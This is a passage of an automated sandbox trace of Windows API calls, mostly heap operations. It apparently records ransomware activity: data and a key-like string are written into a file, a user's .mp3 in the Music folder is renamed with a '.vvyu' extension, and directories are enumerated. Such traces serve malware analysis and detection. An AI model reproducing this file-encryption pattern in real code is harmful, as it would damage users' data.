hHeap=0x620000) returned 1 [0199.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0199.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f468 | out: hHeap=0x620000) returned 1 [0199.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.385] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x16b23, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x16b23, lpOverlapped=0x0) returned 1 [0199.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.386] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x16b28, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.386] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0199.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.388] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.388] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.388] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.388] CloseHandle (hObject=0x510) returned 1 [0199.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0199.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.391] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\xXLI1eQxvUp5i 0hs6G.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\xxli1eqxvup5i 0hs6g.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\xXLI1eQxvUp5i 0hs6G.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\xxli1eqxvup5i 0hs6g.mp3.vvyu")) returned 1 [0199.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.392] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.396] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa72f75c0, ftCreationTime.dwHighDateTime=0x1d89f38, ftLastAccessTime.dwLowDateTime=0xd5a9abf0, ftLastAccessTime.dwHighDateTime=0x1d8a064, ftLastWriteTime.dwLowDateTime=0xd5a9abf0, ftLastWriteTime.dwHighDateTime=0x1d8a064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_fBV4xgh8cLcTD- y4", cAlternateFileName="_FBV4X~1")) returned 1 [0199.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0199.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x2c6ead8 [0199.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0199.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e917a8 [0199.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0199.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0199.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0199.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0199.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0199.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0199.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0199.398] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa72f75c0, ftCreationTime.dwHighDateTime=0x1d89f38, ftLastAccessTime.dwLowDateTime=0xd5a9abf0, ftLastAccessTime.dwHighDateTime=0x1d8a064, ftLastWriteTime.dwLowDateTime=0xd5a9abf0, ftLastWriteTime.dwHighDateTime=0x1d8a064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_fBV4xgh8cLcTD- y4", cAlternateFileName="_FBV4X~1")) returned 0 [0199.398] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0199.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0199.399] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0199.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0199.399] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0199.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0199.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0199.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.424] HeapFree (in: hHeap=0x620000, 